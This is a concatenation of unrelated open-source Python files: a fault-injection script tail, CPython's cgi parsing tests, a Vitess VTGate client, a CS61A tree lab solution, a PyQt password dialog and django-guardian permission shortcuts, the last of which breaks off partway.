fault_inject_file.write("run "+str(current_time-last_time)+"ns\n")
for item in temp_dict[i]:
location = item.location
if item.Type == "I" or item.Type == "T->I" or item.Type == "T->P":
string = "force -drive sim/:"+location+" " + str(random.choice(["0", "1"]))
string += " 0 ns -cancel 1ns"
else:
string = "force -drive sim/:"+location+" " + str(random.choice(["0", "1"]))
random_start = random.randint(0, deviation)
string += " "+str(random_start)+"ns -cancel "+str(random_start+1)+"ns"
fault_inject_file.write(string+"\n")
fault_inject_file.write("run "+str(sim_end-sim_time)+"ns\n")
fault_inject_file.write("stop")
fault_inject_file.close()
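# Minimal end-to-end sketch, kept out of the import path (network size, times and
# the output directory are placeholder values, not part of the original flow):
if __name__ == "__main__":
    example_faults = generate_links_dictionary(network_size=2, sim_time=10000)
    generate_fault_injection_do(".", sim_time=10000, sim_end=12000,
                                fault_list=example_faults)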
|
kdwink/intellij-community | refs/heads/master | python/testData/quickFixes/PyMakeFunctionFromMethodQuickFixTest/usageSelf.py | 75 | class A():
def method(self):
self.method2()
def metho<caret>d2(self):
print 1 |
kanagasabapathi/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/test/test_cgi.py | 46 | from test.support import run_unittest, check_warnings
import cgi
import os
import sys
import tempfile
import unittest
from io import StringIO, BytesIO
class HackedSysModule:
# The regression test will have real values in sys.argv, which
# will completely confuse the test of the cgi module
argv = []
stdin = sys.stdin
cgi.sys = HackedSysModule()
class ComparableException:
def __init__(self, err):
self.err = err
def __str__(self):
return str(self.err)
def __eq__(self, anExc):
if not isinstance(anExc, Exception):
return NotImplemented
return (self.err.__class__ == anExc.__class__ and
self.err.args == anExc.args)
def __getattr__(self, attr):
return getattr(self.err, attr)
def do_test(buf, method):
env = {}
if method == "GET":
fp = None
env['REQUEST_METHOD'] = 'GET'
env['QUERY_STRING'] = buf
elif method == "POST":
fp = BytesIO(buf.encode('latin-1')) # FieldStorage expects bytes
env['REQUEST_METHOD'] = 'POST'
env['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'
env['CONTENT_LENGTH'] = str(len(buf))
else:
raise ValueError("unknown method: %s" % method)
try:
return cgi.parse(fp, env, strict_parsing=1)
except Exception as err:
return ComparableException(err)
parse_strict_test_cases = [
("", ValueError("bad query field: ''")),
("&", ValueError("bad query field: ''")),
("&&", ValueError("bad query field: ''")),
(";", ValueError("bad query field: ''")),
(";&;", ValueError("bad query field: ''")),
# Should the next few really be valid?
("=", {}),
("=&=", {}),
("=;=", {}),
# This rest seem to make sense
("=a", {'': ['a']}),
("&=a", ValueError("bad query field: ''")),
("=a&", ValueError("bad query field: ''")),
("=&a", ValueError("bad query field: 'a'")),
("b=a", {'b': ['a']}),
("b+=a", {'b ': ['a']}),
("a=b=a", {'a': ['b=a']}),
("a=+b=a", {'a': [' b=a']}),
("&b=a", ValueError("bad query field: ''")),
("b&=a", ValueError("bad query field: 'b'")),
("a=a+b&b=b+c", {'a': ['a b'], 'b': ['b c']}),
("a=a+b&a=b+a", {'a': ['a b', 'b a']}),
("x=1&y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0;z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("Hbc5161168c542333633315dee1182227:key_store_seqid=400006&cuyer=r&view=bustomer&order_id=0bb2e248638833d48cb7fed300000f1b&expire=964546263&lobale=en-US&kid=130003.300038&ss=env",
{'Hbc5161168c542333633315dee1182227:key_store_seqid': ['400006'],
'cuyer': ['r'],
'expire': ['964546263'],
'kid': ['130003.300038'],
'lobale': ['en-US'],
'order_id': ['0bb2e248638833d48cb7fed300000f1b'],
'ss': ['env'],
'view': ['bustomer'],
}),
("group_id=5470&set=custom&_assigned_to=31392&_status=1&_category=100&SUBMIT=Browse",
{'SUBMIT': ['Browse'],
'_assigned_to': ['31392'],
'_category': ['100'],
'_status': ['1'],
'group_id': ['5470'],
'set': ['custom'],
})
]
def norm(seq):
return sorted(seq, key=repr)
def first_elts(list):
return [p[0] for p in list]
def first_second_elts(list):
return [(p[0], p[1][0]) for p in list]
def gen_result(data, environ):
encoding = 'latin-1'
fake_stdin = BytesIO(data.encode(encoding))
fake_stdin.seek(0)
form = cgi.FieldStorage(fp=fake_stdin, environ=environ, encoding=encoding)
result = {}
for k, v in dict(form).items():
result[k] = isinstance(v, list) and form.getlist(k) or v.value
return result
class CgiTests(unittest.TestCase):
def test_strict(self):
for orig, expect in parse_strict_test_cases:
# Test basic parsing
d = do_test(orig, "GET")
self.assertEqual(d, expect, "Error parsing %s method GET" % repr(orig))
d = do_test(orig, "POST")
self.assertEqual(d, expect, "Error parsing %s method POST" % repr(orig))
env = {'QUERY_STRING': orig}
fs = cgi.FieldStorage(environ=env)
if isinstance(expect, dict):
# test dict interface
self.assertEqual(len(expect), len(fs))
self.assertCountEqual(expect.keys(), fs.keys())
##self.assertEqual(norm(expect.values()), norm(fs.values()))
##self.assertEqual(norm(expect.items()), norm(fs.items()))
self.assertEqual(fs.getvalue("nonexistent field", "default"), "default")
# test individual fields
for key in expect.keys():
expect_val = expect[key]
self.assertIn(key, fs)
if len(expect_val) > 1:
self.assertEqual(fs.getvalue(key), expect_val)
else:
self.assertEqual(fs.getvalue(key), expect_val[0])
def test_log(self):
cgi.log("Testing")
cgi.logfp = StringIO()
cgi.initlog("%s", "Testing initlog 1")
cgi.log("%s", "Testing log 2")
self.assertEqual(cgi.logfp.getvalue(), "Testing initlog 1\nTesting log 2\n")
if os.path.exists("/dev/null"):
cgi.logfp = None
cgi.logfile = "/dev/null"
cgi.initlog("%s", "Testing log 3")
def log_cleanup():
"""Restore the global state of the log vars."""
cgi.logfile = ''
cgi.logfp.close()
cgi.logfp = None
cgi.log = cgi.initlog
self.addCleanup(log_cleanup)
cgi.log("Testing log 4")
def test_fieldstorage_readline(self):
# FieldStorage uses readline, which has the capacity to read all
# contents of the input file into memory; we use readline's size argument
# to prevent that for files that do not contain any newlines in
# non-GET/HEAD requests
class TestReadlineFile:
def __init__(self, file):
self.file = file
self.numcalls = 0
def readline(self, size=None):
self.numcalls += 1
if size:
return self.file.readline(size)
else:
return self.file.readline()
def __getattr__(self, name):
file = self.__dict__['file']
a = getattr(file, name)
if not isinstance(a, int):
setattr(self, name, a)
return a
f = TestReadlineFile(tempfile.TemporaryFile("wb+"))
self.addCleanup(f.close)
f.write(b'x' * 256 * 1024)
f.seek(0)
env = {'REQUEST_METHOD':'PUT'}
fs = cgi.FieldStorage(fp=f, environ=env)
self.addCleanup(fs.file.close)
# if we're not chunking properly, readline is only called twice
# (by read_binary); if we are chunking properly, it will be called 5 times
# as long as the chunksize is 1 << 16.
self.assertTrue(f.numcalls > 2)
f.close()
def test_fieldstorage_multipart(self):
#Test basic FieldStorage multipart parsing
env = {
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary={}'.format(BOUNDARY),
'CONTENT_LENGTH': '558'}
fp = BytesIO(POSTDATA.encode('latin-1'))
fs = cgi.FieldStorage(fp, environ=env, encoding="latin-1")
self.assertEqual(len(fs.list), 4)
expect = [{'name':'id', 'filename':None, 'value':'1234'},
{'name':'title', 'filename':None, 'value':''},
{'name':'file', 'filename':'test.txt', 'value':b'Testing 123.\n'},
{'name':'submit', 'filename':None, 'value':' Add '}]
for x in range(len(fs.list)):
for k, exp in expect[x].items():
got = getattr(fs.list[x], k)
self.assertEqual(got, exp)
def test_fieldstorage_multipart_non_ascii(self):
#Test basic FieldStorage multipart parsing
env = {'REQUEST_METHOD':'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary={}'.format(BOUNDARY),
'CONTENT_LENGTH':'558'}
for encoding in ['iso-8859-1','utf-8']:
fp = BytesIO(POSTDATA_NON_ASCII.encode(encoding))
fs = cgi.FieldStorage(fp, environ=env,encoding=encoding)
self.assertEqual(len(fs.list), 1)
expect = [{'name':'id', 'filename':None, 'value':'\xe7\xf1\x80'}]
for x in range(len(fs.list)):
for k, exp in expect[x].items():
got = getattr(fs.list[x], k)
self.assertEqual(got, exp)
_qs_result = {
'key1': 'value1',
'key2': ['value2x', 'value2y'],
'key3': 'value3',
'key4': 'value4'
}
def testQSAndUrlEncode(self):
data = "key2=value2x&key3=value3&key4=value4"
environ = {
'CONTENT_LENGTH': str(len(data)),
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'QUERY_STRING': 'key1=value1&key2=value2y',
'REQUEST_METHOD': 'POST',
}
v = gen_result(data, environ)
self.assertEqual(self._qs_result, v)
def testQSAndFormData(self):
data = """---123
Content-Disposition: form-data; name="key2"
value2y
---123
Content-Disposition: form-data; name="key3"
value3
---123
Content-Disposition: form-data; name="key4"
value4
---123--
"""
environ = {
'CONTENT_LENGTH': str(len(data)),
'CONTENT_TYPE': 'multipart/form-data; boundary=-123',
'QUERY_STRING': 'key1=value1&key2=value2x',
'REQUEST_METHOD': 'POST',
}
v = gen_result(data, environ)
self.assertEqual(self._qs_result, v)
def testQSAndFormDataFile(self):
data = """---123
Content-Disposition: form-data; name="key2"
value2y
---123
Content-Disposition: form-data; name="key3"
value3
---123
Content-Disposition: form-data; name="key4"
value4
---123
Content-Disposition: form-data; name="upload"; filename="fake.txt"
Content-Type: text/plain
this is the content of the fake file
---123--
"""
environ = {
'CONTENT_LENGTH': str(len(data)),
'CONTENT_TYPE': 'multipart/form-data; boundary=-123',
'QUERY_STRING': 'key1=value1&key2=value2x',
'REQUEST_METHOD': 'POST',
}
result = self._qs_result.copy()
result.update({
'upload': b'this is the content of the fake file\n'
})
v = gen_result(data, environ)
self.assertEqual(result, v)
def test_deprecated_parse_qs(self):
# this func is moved to urllib.parse, this is just a sanity check
with check_warnings(('cgi.parse_qs is deprecated, use urllib.parse.'
'parse_qs instead', DeprecationWarning)):
self.assertEqual({'a': ['A1'], 'B': ['B3'], 'b': ['B2']},
cgi.parse_qs('a=A1&b=B2&B=B3'))
def test_deprecated_parse_qsl(self):
# this func is moved to urllib.parse, this is just a sanity check
with check_warnings(('cgi.parse_qsl is deprecated, use urllib.parse.'
'parse_qsl instead', DeprecationWarning)):
self.assertEqual([('a', 'A1'), ('b', 'B2'), ('B', 'B3')],
cgi.parse_qsl('a=A1&b=B2&B=B3'))
def test_parse_header(self):
self.assertEqual(
cgi.parse_header("text/plain"),
("text/plain", {}))
self.assertEqual(
cgi.parse_header("text/vnd.just.made.this.up ; "),
("text/vnd.just.made.this.up", {}))
self.assertEqual(
cgi.parse_header("text/plain;charset=us-ascii"),
("text/plain", {"charset": "us-ascii"}))
self.assertEqual(
cgi.parse_header('text/plain ; charset="us-ascii"'),
("text/plain", {"charset": "us-ascii"}))
self.assertEqual(
cgi.parse_header('text/plain ; charset="us-ascii"; another=opt'),
("text/plain", {"charset": "us-ascii", "another": "opt"}))
self.assertEqual(
cgi.parse_header('attachment; filename="silly.txt"'),
("attachment", {"filename": "silly.txt"}))
self.assertEqual(
cgi.parse_header('attachment; filename="strange;name"'),
("attachment", {"filename": "strange;name"}))
self.assertEqual(
cgi.parse_header('attachment; filename="strange;name";size=123;'),
("attachment", {"filename": "strange;name", "size": "123"}))
BOUNDARY = "---------------------------721837373350705526688164684"
POSTDATA = """-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="id"
1234
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="title"
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
Testing 123.
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="submit"
Add\x20
-----------------------------721837373350705526688164684--
"""
POSTDATA_NON_ASCII = """-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="id"
\xe7\xf1\x80
-----------------------------721837373350705526688164684
"""
def test_main():
run_unittest(CgiTests)
if __name__ == '__main__':
test_main()
|
yangzhongj/vitess | refs/heads/master | py/vtdb/vtgatev3.py | 5 | # Copyright 2013 Google Inc. All Rights Reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
from itertools import izip
import logging
import re
from net import bsonrpc
from net import gorpc
from vtdb import cursorv3
from vtdb import dbexceptions
from vtdb import field_types
from vtdb import vtdb_logger
_errno_pattern = re.compile(r'\(errno (\d+)\)')
def log_exception(method):
"""Decorator for logging the exception from vtgatev2.
The convert_exception method interprets and recasts the exceptions
raised by lower-layer. The inner function calls the appropriate vtdb_logger
method based on the exception raised.
Args:
method: Method that takes exc, *args, where exc is an exception raised
by calling code, args are additional args for the exception.
Returns:
Decorated method.
"""
def _log_exception(exc, *args):
logger_object = vtdb_logger.get_logger()
new_exception = method(exc, *args)
if isinstance(new_exception, dbexceptions.IntegrityError):
logger_object.integrity_error(new_exception)
else:
logger_object.vtgatev2_exception(new_exception)
return new_exception
return _log_exception
def handle_app_error(exc_args):
msg = str(exc_args[0]).lower()
if msg.startswith('request_backlog'):
return dbexceptions.RequestBacklog(exc_args)
match = _errno_pattern.search(msg)
if match:
mysql_errno = int(match.group(1))
# Prune the error message to truncate the query string
# returned by mysql as it contains bind variables.
if mysql_errno == 1062:
parts = _errno_pattern.split(msg)
pruned_msg = msg[:msg.find(parts[2])]
new_args = (pruned_msg,) + tuple(exc_args[1:])
return dbexceptions.IntegrityError(new_args)
return dbexceptions.DatabaseError(exc_args)
@log_exception
def convert_exception(exc, *args):
new_args = exc.args + args
if isinstance(exc, gorpc.TimeoutError):
return dbexceptions.TimeoutError(new_args)
elif isinstance(exc, gorpc.AppError):
return handle_app_error(new_args)
elif isinstance(exc, gorpc.ProgrammingError):
return dbexceptions.ProgrammingError(new_args)
elif isinstance(exc, gorpc.GoRpcError):
return dbexceptions.FatalError(new_args)
return exc
def _create_req(sql, new_binds, tablet_type, not_in_transaction):
new_binds = field_types.convert_bind_vars(new_binds)
req = {
'Sql': sql,
'BindVariables': new_binds,
'TabletType': tablet_type,
'NotInTransaction': not_in_transaction,
}
return req
class VTGateConnection(object):
"""This utilizes the V3 API of VTGate."""
def __init__(self, addr, timeout, user=None, password=None,
keyfile=None, certfile=None):
# TODO: Merge. This is very similar to vtgatev2.
self.session = None
self.addr = addr
self.user = user
self.password = password
self.keyfile = keyfile
self.certfile = certfile
self.timeout = timeout
self.client = self._create_client()
self.logger_object = vtdb_logger.get_logger()
def _create_client(self):
# TODO: Merge. This is very similar to vtgatev2.
return bsonrpc.BsonRpcClient(
self.addr, self.timeout, self.user, self.password,
keyfile=self.keyfile, certfile=self.certfile)
def _get_client(self):
"""Get current client or create a new one and connect."""
# TODO: Merge. This is very similar to vtgatev2.
if not self.client:
self.client = self._create_client()
try:
self.client.dial()
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
return self.client
def __str__(self):
return '<VTGateConnection %s >' % self.addr
def dial(self):
# TODO: Merge. This is very similar to vtgatev2.
try:
if not self.is_closed():
self.close()
self._get_client().dial()
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def close(self):
# TODO: Merge. This is very similar to vtgatev2.
if self.session:
self.rollback()
if self.client:
self.client.close()
def is_closed(self):
# TODO: Merge. This is very similar to vtgatev2.
return not self.client or self.client.is_closed()
def cursor(self, *pargs, **kwargs):
cursorclass = kwargs.pop('cursorclass', None) or cursorv3.Cursor
return cursorclass(self, *pargs, **kwargs)
def begin(self, effective_caller_id=None):
_ = effective_caller_id # TODO: Pass effective_caller_id through.
try:
response = self._get_client().call('VTGate.Begin', None)
self.session = response.reply
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def commit(self):
try:
session = self.session
self.session = None
self._get_client().call('VTGate.Commit', session)
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def rollback(self):
try:
session = self.session
self.session = None
self._get_client().call('VTGate.Rollback', session)
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def _add_session(self, req):
if self.session:
req['Session'] = self.session
def _update_session(self, response):
if response.reply.get('Session'):
self.session = response.reply['Session']
def _execute(
self, sql, bind_variables, tablet_type, not_in_transaction=False):
req = _create_req(sql, bind_variables, tablet_type, not_in_transaction)
self._add_session(req)
fields = []
conversions = []
results = []
rowcount = 0
lastrowid = 0
try:
response = self._get_client().call('VTGate.Execute', req)
self._update_session(response)
reply = response.reply
if response.reply.get('Error'):
raise gorpc.AppError(response.reply['Error'], 'VTGate.Execute')
if reply.get('Result'):
res = reply['Result']
for field in res['Fields']:
fields.append((field['Name'], field['Type']))
conversions.append(field_types.conversions.get(field['Type']))
for row in res['Rows']:
results.append(tuple(_make_row(row, conversions)))
rowcount = res['RowsAffected']
lastrowid = res['InsertId']
except gorpc.GoRpcError as e:
self.logger_object.log_private_data(bind_variables)
raise convert_exception(e, str(self), sql)
except Exception:
logging.exception('gorpc low-level error')
raise
return results, rowcount, lastrowid, fields
def _execute_batch(
self, sql_list, bind_variables_list, tablet_type, as_transaction):
query_list = []
for sql, bind_vars in zip(sql_list, bind_variables_list):
query = {}
query['Sql'] = sql
query['BindVariables'] = field_types.convert_bind_vars(bind_vars)
query_list.append(query)
rowsets = []
try:
req = {
'Queries': query_list,
'TabletType': tablet_type,
'AsTransaction': as_transaction,
}
self._add_session(req)
response = self._get_client().call('VTGate.ExecuteBatch', req)
self._update_session(response)
if response.reply.get('Error'):
raise gorpc.AppError(response.reply['Error'], 'VTGate.ExecuteBatch')
for reply in response.reply['List']:
fields = []
conversions = []
results = []
rowcount = 0
for field in reply['Fields']:
fields.append((field['Name'], field['Type']))
conversions.append(field_types.conversions.get(field['Type']))
for row in reply['Rows']:
results.append(tuple(_make_row(row, conversions)))
rowcount = reply['RowsAffected']
lastrowid = reply['InsertId']
rowsets.append((results, rowcount, lastrowid, fields))
except gorpc.GoRpcError as e:
self.logger_object.log_private_data(bind_variables_list)
raise convert_exception(e, str(self), sql_list)
except Exception:
logging.exception('gorpc low-level error')
raise
return rowsets
def _stream_execute(
self, sql, bind_variables, tablet_type, not_in_transaction=False):
req = _create_req(sql, bind_variables, tablet_type, not_in_transaction)
self._add_session(req)
rpc_client = self._get_client()
stream_fields = []
stream_conversions = []
try:
rpc_client.stream_call('VTGate.StreamExecute', req)
first_response = rpc_client.stream_next()
reply = first_response.reply['Result']
for field in reply['Fields']:
stream_fields.append((field['Name'], field['Type']))
stream_conversions.append(
field_types.conversions.get(field['Type']))
except gorpc.GoRpcError as e:
self.logger_object.log_private_data(bind_variables)
raise convert_exception(e, str(self), sql)
except Exception:
logging.exception('gorpc low-level error')
raise
# Take the BsonRpcClient from VTGateConnection. The row_generator
# will manage the BsonRpcClient. This VTGateConnection will connect
# to a new client if needed.
self.client = None
def row_generator():
# TODO: Merge. This is very similar to vtgatev2.
try:
while True:
try:
stream_result = rpc_client.stream_next()
if stream_result is None:
break
# A session message, if any comes separately with no rows.
# I am not sure if we can ignore this.
if stream_result.reply.get('Session'):
self.session = stream_result.reply['Session']
else:
for result_item in stream_result.reply['Result']['Rows']:
yield tuple(_make_row(result_item, stream_conversions))
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
except Exception:
logging.exception('gorpc low-level error')
raise
finally:
rpc_client.close()
return row_generator(), stream_fields
def _make_row(row, conversions):
# TODO: Merge. This is very similar to vtgatev2.
converted_row = []
for conversion_func, field_data in izip(conversions, row):
if field_data is None:
v = None
elif conversion_func:
v = conversion_func(field_data)
else:
v = field_data
converted_row.append(v)
return converted_row
def connect(*pargs, **kwargs):
conn = VTGateConnection(*pargs, **kwargs)
conn.dial()
return conn
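# Illustrative connection lifecycle (address and timeout are placeholder values;
# error handling omitted):
#
#     conn = connect('localhost:15991', 30.0)
#     conn.begin()
#     # ... run statements through a cursor obtained from conn.cursor() ...
#     conn.commit()
#     conn.close()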
|
tavaresdong/courses-notes | refs/heads/master | ucb_cs61A/lab/lab05/lab05.py | 3 | ## Trees ##
# Q4
def make_pytunes(username):
"""Return a pyTunes tree as shown in the diagram with USERNAME as the value
of the root.
>>> pytunes = make_pytunes('i_love_music')
>>> print_tree(pytunes)
i_love_music
pop
justin bieber
single
what do you mean?
2015 pop mashup
trance
darude
sandstorm
"""
"*** YOUR CODE HERE ***"
    pytune = tree(username,
                  [tree('pop', [tree('justin bieber', [tree('single',
                                    [tree('what do you mean?')])]),
                                tree('2015 pop mashup')]),
                   tree('trance', [tree('darude', [tree('sandstorm')])])])
return pytune
# Q5
def num_songs(t):
"""Return the number of songs in the pyTunes tree, t.
>>> pytunes = make_pytunes('i_love_music')
>>> num_songs(pytunes)
3
"""
"*** YOUR CODE HERE ***"
if is_leaf(t):
return 1
else:
sum_songs = 0
for subt in branches(t):
sum_songs += num_songs(subt)
return sum_songs
# better : sum([num_songs(b) for b in branches(t)])
# Q6
def find(t, target):
"""Returns True if t contains a node with the value TARGET and False
otherwise.
>>> my_account = tree('kpop_king',
... [tree('korean',
... [tree('gangnam style'),
... tree('wedding dress')]),
... tree('pop',
... [tree('t-swift',
... [tree('blank space')]),
... tree('uptown funk'),
... tree('see you again')])])
>>> find(my_account, 'korean')
True
>>> find(my_account, 'blank space')
True
>>> find(my_account, 'bad blood')
False
"""
"*** YOUR CODE HERE ***"
if root(t) == target:
return True
else:
for b in branches(t):
if find(b, target):
return True
return False
# Q7
def add_song(t, song, category):
"""Returns a new tree with SONG added to CATEGORY. Assume the CATEGORY
already exists.
>>> indie_tunes = tree('indie_tunes',
... [tree('indie',
... [tree('vance joy',
... [tree('riptide')])])])
>>> new_indie = add_song(indie_tunes, 'georgia', 'vance joy')
>>> print_tree(new_indie)
indie_tunes
indie
vance joy
riptide
georgia
"""
"*** YOUR CODE HERE ***"
if root(t) == category and (not is_leaf(t)):
return tree(root(t), branches(t) + [tree(song)])
else:
new_branches = [add_song(b, song, category) for b in branches(t)]
return tree(root(t), new_branches)
# Q8
def delete(t, target):
"""Returns the tree that results from deleting TARGET from t. If TARGET is
a category, delete everything inside of it.
>>> my_account = tree('kpop_king',
... [tree('korean',
... [tree('gangnam style'),
... tree('wedding dress')]),
... tree('pop',
... [tree('t-swift',
... [tree('blank space')]),
... tree('uptown funk'),
... tree('see you again')])])
>>> new = delete(my_account, 'pop')
>>> print_tree(new)
kpop_king
korean
gangnam style
wedding dress
"""
"*** YOUR CODE HERE ***"
remain_branches = []
for b in branches(t):
if root(b) != target:
remain_branches += [delete(b, target)]
return tree(root(t), remain_branches)
# ADT
def tree(root, branches=[]):
for branch in branches:
assert is_tree(branch), 'branches must be trees'
return [root] + list(branches)
def root(tree):
return tree[0]
def branches(tree):
return tree[1:]
def is_tree(tree):
if type(tree) != list or len(tree) < 1:
return False
for branch in branches(tree):
if not is_tree(branch):
return False
return True
def is_leaf(tree):
return not branches(tree)
numbers = tree(1, [tree(2), tree(3, [tree(4), tree(5)]), tree(6, [tree(7)])])
def print_tree(t, indent=0):
"""Print a representation of this tree in which each node is
indented by two spaces times its depth from the root.
>>> print_tree(tree(1))
1
>>> print_tree(tree(1, [tree(2)]))
1
2
>>> print_tree(numbers)
1
2
3
4
5
6
7
"""
print(' ' * indent + str(root(t)))
for branch in branches(t):
print_tree(branch, indent + 1)
|
lalinsky/picard | refs/heads/master | picard/ui/ui_passworddialog.py | 5 | # -*- coding: utf-8 -*-
# Automatically generated - don't edit.
# Use `python setup.py build_ui` to update it.
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_PasswordDialog(object):
def setupUi(self, PasswordDialog):
PasswordDialog.setObjectName(_fromUtf8("PasswordDialog"))
PasswordDialog.setWindowModality(QtCore.Qt.WindowModal)
PasswordDialog.resize(378, 246)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(PasswordDialog.sizePolicy().hasHeightForWidth())
PasswordDialog.setSizePolicy(sizePolicy)
self.verticalLayout = QtGui.QVBoxLayout(PasswordDialog)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.info_text = QtGui.QLabel(PasswordDialog)
self.info_text.setText(_fromUtf8(""))
self.info_text.setWordWrap(True)
self.info_text.setObjectName(_fromUtf8("info_text"))
self.verticalLayout.addWidget(self.info_text)
spacerItem = QtGui.QSpacerItem(20, 60, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.label = QtGui.QLabel(PasswordDialog)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.username = QtGui.QLineEdit(PasswordDialog)
self.username.setWindowModality(QtCore.Qt.NonModal)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.username.sizePolicy().hasHeightForWidth())
self.username.setSizePolicy(sizePolicy)
self.username.setObjectName(_fromUtf8("username"))
self.verticalLayout.addWidget(self.username)
self.label_2 = QtGui.QLabel(PasswordDialog)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.password = QtGui.QLineEdit(PasswordDialog)
self.password.setEchoMode(QtGui.QLineEdit.Password)
self.password.setObjectName(_fromUtf8("password"))
self.verticalLayout.addWidget(self.password)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem1)
self.buttonbox = QtGui.QDialogButtonBox(PasswordDialog)
self.buttonbox.setOrientation(QtCore.Qt.Horizontal)
self.buttonbox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonbox.setObjectName(_fromUtf8("buttonbox"))
self.verticalLayout.addWidget(self.buttonbox)
self.retranslateUi(PasswordDialog)
QtCore.QObject.connect(self.buttonbox, QtCore.SIGNAL(_fromUtf8("rejected()")), PasswordDialog.reject)
QtCore.QMetaObject.connectSlotsByName(PasswordDialog)
def retranslateUi(self, PasswordDialog):
PasswordDialog.setWindowTitle(_("Authentication required"))
self.label.setText(_("Username:"))
self.label_2.setText(_("Password:"))
|
olevinsky/django-guardian | refs/heads/master | guardian/shortcuts.py | 9 | """
Convenient shortcuts to manage or check object permissions.
"""
from django.contrib.auth.models import Permission, User, Group
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import Q
from django.shortcuts import _get_queryset
from guardian.core import ObjectPermissionChecker
from guardian.exceptions import MixedContentTypeError
from guardian.exceptions import WrongAppError
from guardian.models import UserObjectPermission, GroupObjectPermission
from guardian.utils import get_identity
from itertools import groupby
def assign(perm, user_or_group, obj=None):
"""
Assigns permission to user/group and object pair.
:param perm: proper permission for given ``obj``, as string (in format:
``app_label.codename`` or ``codename``). If ``obj`` is not given, must
be in format ``app_label.codename``.
:param user_or_group: instance of ``User``, ``AnonymousUser`` or ``Group``;
passing any other object would raise
``guardian.exceptions.NotUserNorGroup`` exception
:param obj: persisted Django's ``Model`` instance or ``None`` if assigning
global permission. Default is ``None``.
We can assign permission for ``Model`` instance for specific user:
>>> from django.contrib.sites.models import Site
>>> from django.contrib.auth.models import User, Group
>>> from guardian.shortcuts import assign
>>> site = Site.objects.get_current()
>>> user = User.objects.create(username='joe')
>>> assign("change_site", user, site)
<UserObjectPermission: example.com | joe | change_site>
>>> user.has_perm("change_site", site)
True
... or we can assign permission for group:
>>> group = Group.objects.create(name='joe-group')
>>> user.groups.add(group)
>>> assign("delete_site", group, site)
<GroupObjectPermission: example.com | joe-group | delete_site>
>>> user.has_perm("delete_site", site)
True
**Global permissions**
This function may also be used to assign standard, *global* permissions if
``obj`` parameter is omitted. Added Permission would be returned in that
case:
>>> assign("sites.change_site", user)
<Permission: sites | site | Can change site>
"""
user, group = get_identity(user_or_group)
# If obj is None we try to operate on global permissions
if obj is None:
try:
app_label, codename = perm.split('.', 1)
except ValueError:
raise ValueError("For global permissions, first argument must be in"
" format: 'app_label.codename' (is %r)" % perm)
perm = Permission.objects.get(content_type__app_label=app_label,
codename=codename)
if user:
user.user_permissions.add(perm)
return perm
if group:
group.permissions.add(perm)
return perm
perm = perm.split('.')[-1]
if user:
return UserObjectPermission.objects.assign(perm, user, obj)
if group:
return GroupObjectPermission.objects.assign(perm, group, obj)
def remove_perm(perm, user_or_group=None, obj=None):
"""
Removes permission from user/group and object pair.
:param perm: proper permission for given ``obj``, as string (in format:
``app_label.codename`` or ``codename``). If ``obj`` is not given, must
be in format ``app_label.codename``.
:param user_or_group: instance of ``User``, ``AnonymousUser`` or ``Group``;
passing any other object would raise
``guardian.exceptions.NotUserNorGroup`` exception
:param obj: persisted Django's ``Model`` instance or ``None`` if assigning
global permission. Default is ``None``.
"""
user, group = get_identity(user_or_group)
if obj is None:
try:
app_label, codename = perm.split('.', 1)
except ValueError:
raise ValueError("For global permissions, first argument must be in"
" format: 'app_label.codename' (is %r)" % perm)
perm = Permission.objects.get(content_type__app_label=app_label,
codename=codename)
if user:
user.user_permissions.remove(perm)
return
elif group:
group.permissions.remove(perm)
return
perm = perm.split('.')[-1]
if user:
UserObjectPermission.objects.remove_perm(perm, user, obj)
if group:
GroupObjectPermission.objects.remove_perm(perm, group, obj)
def get_perms(user_or_group, obj):
"""
Returns permissions for given user/group and object pair, as list of
strings.
"""
check = ObjectPermissionChecker(user_or_group)
return check.get_perms(obj)
def get_perms_for_model(cls):
"""
Returns queryset of all Permission objects for the given class. It is
possible to pass Model as class or instance.
"""
if isinstance(cls, str):
app_label, model_name = cls.split('.')
model = models.get_model(app_label, model_name)
else:
model = cls
